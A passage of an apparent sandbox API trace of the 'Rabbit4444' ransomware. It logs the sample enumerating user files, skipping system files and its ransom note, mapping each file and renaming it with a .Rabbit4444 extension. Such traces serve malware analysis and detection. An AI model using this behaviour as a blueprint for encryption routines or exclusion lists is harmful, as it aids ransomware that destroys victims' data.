lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cbf5e617-6ef4-410e-8402-bdb7bbf74c0c}.rabbit4444"), dwFlags=0x1) returned 1 [0068.396] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bcf4a12, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bcf4a12, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", cAlternateFileName="{CC799~1")) returned 1 [0068.396] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="Rabbit4444.exe") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2=".") returned 1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="..") returned 1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="windows") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="bootmgr") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="pagefile.sys") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="boot") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="ids.txt") returned -1 [0068.397] lstrcmpiW (lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", lpString2="NTUSER.DAT") returned -1 [0068.397] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}" | out: lpString1="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}") returned="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}" [0068.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CC7998BC-2891-44C5-8EC4-A45AC15BC944}", dwFileAttributes=0x0) returned 1 [0068.398] lstrlenW (lpString="{CC7998BC-2891-44C5-8EC4-A45AC15BC944}") returned 38 [0068.398] lstrlenW (lpString="Rabbit4444") returned 10 [0068.398] lstrcmpiW (lpString1="AC15BC944}", lpString2="Rabbit4444") returned -1 [0068.398] lstrlenW (lpString=".dll") returned 4 [0068.398] lstrcmpiW (lpString1="944}", lpString2=".dll") returned 1 [0068.398] lstrlenW (lpString=".lnk") returned 4 [0068.398] lstrcmpiW (lpString1="944}", lpString2=".lnk") returned 1 [0068.398] lstrlenW (lpString=".ini") returned 4 [0068.398] lstrcmpiW (lpString1="944}", lpString2=".ini") returned 1 [0068.398] lstrlenW (lpString=".sys") returned 4 [0068.398] lstrcmpiW (lpString1="944}", lpString2=".sys") returned 1 [0068.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CC7998BC-2891-44C5-8EC4-A45AC15BC944}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cc7998bc-2891-44c5-8ec4-a45ac15bc944}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.398] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.398] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15970903872) returned 1 [0068.398] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0068.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.398] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.400] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.402] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15971306492) returned 1 [0068.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0068.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.402] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.403] CloseHandle (hObject=0x29c) returned 1 [0068.403] CloseHandle (hObject=0x280) returned 1 [0068.403] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CC7998BC-2891-44C5-8EC4-A45AC15BC944}.Rabbit4444") returned 156 [0068.403] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CC7998BC-2891-44C5-8EC4-A45AC15BC944}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cc7998bc-2891-44c5-8ec4-a45ac15bc944}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CC7998BC-2891-44C5-8EC4-A45AC15BC944}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cc7998bc-2891-44c5-8ec4-a45ac15bc944}.rabbit4444"), dwFlags=0x1) returned 1 [0068.403] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0f0f3a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a0f0f3a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", cAlternateFileName="{CCFCB~1")) returned 1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="Rabbit4444.exe") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2=".") returned 1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="..") returned 1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="windows") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="bootmgr") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="pagefile.sys") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="boot") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="ids.txt") returned -1 [0068.404] lstrcmpiW (lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", lpString2="NTUSER.DAT") returned -1 [0068.404] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}" | out: lpString1="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}") returned="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}" [0068.404] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}", dwFileAttributes=0x0) returned 1 [0068.404] lstrlenW (lpString="{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}") returned 38 [0068.404] lstrlenW (lpString="Rabbit4444") returned 10 [0068.404] lstrcmpiW (lpString1="B32C6B79B}", lpString2="Rabbit4444") returned -1 [0068.404] lstrlenW (lpString=".dll") returned 4 [0068.404] lstrcmpiW (lpString1="79B}", lpString2=".dll") returned 1 [0068.404] lstrlenW (lpString=".lnk") returned 4 [0068.404] lstrcmpiW (lpString1="79B}", lpString2=".lnk") returned 1 [0068.404] lstrlenW (lpString=".ini") returned 4 [0068.404] lstrcmpiW (lpString1="79B}", lpString2=".ini") returned 1 [0068.404] lstrlenW (lpString=".sys") returned 4 [0068.404] lstrcmpiW (lpString1="79B}", lpString2=".sys") returned 1 [0068.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ccfcb7fc-2028-4a4a-abf5-e54b32c6b79b}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.405] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.405] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15971562598) returned 1 [0068.405] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0068.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0068.405] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.406] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.407] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.407] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15971825199) returned 1 [0068.408] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0068.408] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0068.408] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.408] CloseHandle (hObject=0x29c) returned 1 [0068.408] CloseHandle (hObject=0x280) returned 1 [0068.408] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}.Rabbit4444") returned 156 [0068.408] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ccfcb7fc-2028-4a4a-abf5-e54b32c6b79b}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CCFCB7FC-2028-4A4A-ABF5-E54B32C6B79B}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ccfcb7fc-2028-4a4a-abf5-e54b32c6b79b}.rabbit4444"), dwFlags=0x1) returned 1 [0068.409] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0d4747, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c0d4747, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", cAlternateFileName="{CD020~1")) returned 1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="Rabbit4444.exe") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2=".") returned 1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="..") returned 1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="windows") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="bootmgr") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="pagefile.sys") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="boot") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="ids.txt") returned -1 [0068.409] lstrcmpiW (lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", lpString2="NTUSER.DAT") returned -1 [0068.409] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}" | out: lpString1="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}") returned="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}" [0068.409] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}", dwFileAttributes=0x0) returned 1 [0068.409] lstrlenW (lpString="{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}") returned 38 [0068.409] lstrlenW (lpString="Rabbit4444") returned 10 [0068.409] lstrcmpiW (lpString1="EEA418F08}", lpString2="Rabbit4444") returned -1 [0068.409] lstrlenW (lpString=".dll") returned 4 [0068.409] lstrcmpiW (lpString1="F08}", lpString2=".dll") returned 1 [0068.409] lstrlenW (lpString=".lnk") returned 4 [0068.409] lstrcmpiW (lpString1="F08}", lpString2=".lnk") returned 1 [0068.410] lstrlenW (lpString=".ini") returned 4 [0068.410] lstrcmpiW (lpString1="F08}", lpString2=".ini") returned 1 [0068.410] lstrlenW (lpString=".sys") returned 4 [0068.410] lstrcmpiW (lpString1="F08}", lpString2=".sys") returned 1 [0068.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cd020aad-9574-4af9-8be0-5deeea418f08}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.410] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15972078308) returned 1 [0068.410] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.410] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.411] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.412] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.413] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15972346217) returned 1 [0068.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.413] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.413] CloseHandle (hObject=0x29c) returned 1 [0068.413] CloseHandle (hObject=0x280) returned 1 [0068.413] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}.Rabbit4444") returned 156 [0068.413] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cd020aad-9574-4af9-8be0-5deeea418f08}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CD020AAD-9574-4AF9-8BE0-5DEEEA418F08}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cd020aad-9574-4af9-8be0-5deeea418f08}.rabbit4444"), dwFlags=0x1) returned 1 [0068.414] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a294928, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a294928, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", cAlternateFileName="{CEB91~1")) returned 1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="Rabbit4444.exe") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2=".") returned 1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="..") returned 1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="windows") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="bootmgr") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="pagefile.sys") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="boot") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="ids.txt") returned -1 [0068.414] lstrcmpiW (lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", lpString2="NTUSER.DAT") returned -1 [0068.414] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}" | out: lpString1="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}") returned="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}" [0068.414] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}", dwFileAttributes=0x0) returned 1 [0068.415] lstrlenW (lpString="{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}") returned 38 [0068.415] lstrlenW (lpString="Rabbit4444") returned 10 [0068.415] lstrcmpiW (lpString1="C011B37FA}", lpString2="Rabbit4444") returned -1 [0068.415] lstrlenW (lpString=".dll") returned 4 [0068.415] lstrcmpiW (lpString1="7FA}", lpString2=".dll") returned 1 [0068.415] lstrlenW (lpString=".lnk") returned 4 [0068.415] lstrcmpiW (lpString1="7FA}", lpString2=".lnk") returned 1 [0068.415] lstrlenW (lpString=".ini") returned 4 [0068.415] lstrcmpiW (lpString1="7FA}", lpString2=".ini") returned 1 [0068.415] lstrlenW (lpString=".sys") returned 4 [0068.415] lstrcmpiW (lpString1="7FA}", lpString2=".sys") returned 1 [0068.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CEB91A43-1CEE-4EEE-98B6-9A4C011B37FA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{ceb91a43-1cee-4eee-98b6-9a4c011b37fa}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.415] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.415] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15972602156) returned 1 [0068.415] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0068.415] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.417] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 